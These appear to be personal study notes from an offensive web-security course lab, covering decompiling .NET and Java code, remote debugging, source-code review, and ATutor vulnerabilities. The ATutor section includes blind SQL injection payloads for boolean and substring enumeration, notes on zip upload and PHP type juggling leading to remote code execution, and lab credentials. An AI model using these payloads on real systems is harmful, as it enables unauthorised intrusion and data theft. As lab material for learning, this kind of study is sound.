=========================================================================
Code Setups
.NET Code
RDP to service
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /u: /p: /v:dnn /u:administrator /p:studentlab /size:1180x708
Compile Source Code
c:\Users\Administrator\Desktop>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs
dnSpy - decompile and debugger
- Download: https://github.com/dnSpy/dnSpy
- Main Code: Executables –> Program
- How to search?
- Open relevant modules in Program
- Search for ‘methods’
- Right click –> Analyze to find “Used by” and “Uses”
- How to modify assemblies?
- Building block of .NET applications. Can be EXE or DLL.
- Program –> Right Click “Edit Class” –> Modify Code –> Save All –> Save Module
Java Classes
Prerequisites
- Install JDK:
sudo apt install default-jdk
How to run Java code?
- Create source code –> test.java
- Create class file –>
javac -source 1.8 -target 1.8 test.java - Create JAR file:
mkdir META-INFecho "Main-Class: test" > META-INF/MANIFEST.MFjar cmvf META-INF/MANIFEST.MF test.jar test.class
- Execute file:
java -jar test.jar
How to transfer Java files - Windows?
- Kali:
sudo impacket-smbserver test .xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /u: /p: /v:manageengine /u:administrator /p:studentlab /size:1180x708
- Windows:
\\your-kali-machine-ip\test
JD-GUI - decompiler
- Search function
=======================================================================
Identifying source code vulnerabilities
- Unauthenticated areas
- Sanitisation of User Input
- Request parameters
- Identify how filters and sanitisation is performed –> Open source / Custom
- Databases
- Sanitised or parameterized queries?
- Account creation and password reset functionalities
- Interactions with the operating system –> Command injection
- Programming specific vulnerabilities
=======================================================================
Remote Debugging
Java
- Create launch.json in VSCode
- Add Configurations –> Java: Attach to Remote Program
- Debugging attach to 127.0.0.1:9898:
java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9898 -jar NumberGame.jar
=======================================================================
ATutor - PHP
Logging
Database Logging
sudo nano /etc/mysql/my.cnf–> general_log = 1sudo systemctl restart mysqlsudo tail –f /var/log/mysql/mysql.log
PHP Enable Errors
/etc/php5/apache2/php.ini–> display_errors = Onsudo systemctl restart apache2
Code Review - SQLi + Zip File Upload to RCE
- Unauthenticated:
grep -rnw /var/www/html/ATutor -e "^.*user_location.*public.*" --color - Search for functions:
grep -rnw /var/www/html/ATutor -e "function searchFriends" --color - Self-defined functions:
$name = $addslashes($name); - Blind SQL:
AAAA')/**/or/**/(select/**/1)=1%23 - Substring Enumeration:
select/**/(substring((select/**/version()),1,1))='4'; - ASCII Substring Enumeration:
select/**/ascii(substring((select/**/version()),1,1))=53;- https://www.w3resource.com/mysql/string-functions/mysql-ascii-function.php
- Zip File Upload:
grep -ir "IMS manifest file is missing" /var/www/html/ATutor --color
Creating Python Script
from bs4 import BeautifulSoup
Code Review - Type Juggling to RCE
- String to integer type casting:
var_dump('0xAAAA' == '43690'); - http://php.net/manual/en/language.types.string.php#language.types.string.conversion
- Grep for SHA1/MD5 for magic hashes